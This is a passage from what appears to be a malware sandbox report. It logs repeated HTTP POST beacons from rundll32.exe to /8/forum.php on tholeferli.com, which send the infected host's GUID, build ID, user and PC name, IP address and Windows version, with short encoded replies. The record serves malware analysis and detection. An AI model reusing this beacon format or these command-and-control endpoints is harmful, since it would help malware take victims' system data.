                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:30.440629005 CEST351INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:30 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 56 59 42 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cVYBEARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                51192.168.2.2249218194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:30.829647064 CEST352OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:30.989835024 CEST352INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:30 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 51 4a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZQJAARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                52192.168.2.2249219194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:31.273880959 CEST353OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:32.441133976 CEST354INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:32 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4e 42 59 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cNBYMARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                53192.168.2.2249220194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:32.852581978 CEST354OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:33.020685911 CEST355INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:32 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 56 4d 4e 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cVMNEARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                54192.168.2.2249221194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:33.445880890 CEST356OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:33.601244926 CEST356INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:33 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4e 48 53 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cNHSMARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                55192.168.2.2249222194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:33.880182028 CEST357OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:34.034898996 CEST357INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:33 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4d 41 5a 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cMAZNARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                56192.168.2.2249223194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:34.310890913 CEST358OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:34.467071056 CEST358INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:34 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 54 4b 50 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cTKPGARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                57192.168.2.2249224194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:34.750005960 CEST359OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:34.902857065 CEST359INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:34 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 41 56 45 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cAVEZARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                58192.168.2.2249225194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:35.193599939 CEST360OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:35.361417055 CEST360INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:35 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 54 4e 4d 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cTNMGARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                59192.168.2.2249226194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:35.637610912 CEST361OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:35.809911013 CEST361INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:35 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 42 59 42 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cBYBYARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                6192.168.2.2249174194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:06.534090996 CEST296OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:06.691916943 CEST297INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:06 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4b 48 53 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cKHSPARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                60192.168.2.2249227194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:36.091660023 CEST362OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:36.260988951 CEST363INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:36 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 42 59 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZBYAARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                61192.168.2.2249228194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:36.546857119 CEST363OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:36.715334892 CEST364INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:36 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 48 5a 41 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cHZASARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                62192.168.2.2249229194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:36.997251987 CEST365OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:37.152971029 CEST365INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:37 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4d 51 4a 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cMQJNARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                63192.168.2.2249230194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:37.433851004 CEST366OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:37.590899944 CEST366INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:37 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 54 47 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZTGAARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                64192.168.2.2249231194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:37.876390934 CEST367OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:38.042412996 CEST367INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:37 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 47 41 5a 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cGAZTARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                65192.168.2.2249232194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:38.326898098 CEST368OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:38.494982004 CEST368INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:38 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 42 4b 50 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cBKPYARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                66192.168.2.2249233194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:38.776685953 CEST369OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:38.932934999 CEST369INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:38 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 43 47 54 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cCGTXARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                67192.168.2.2249234194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:39.217582941 CEST370OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
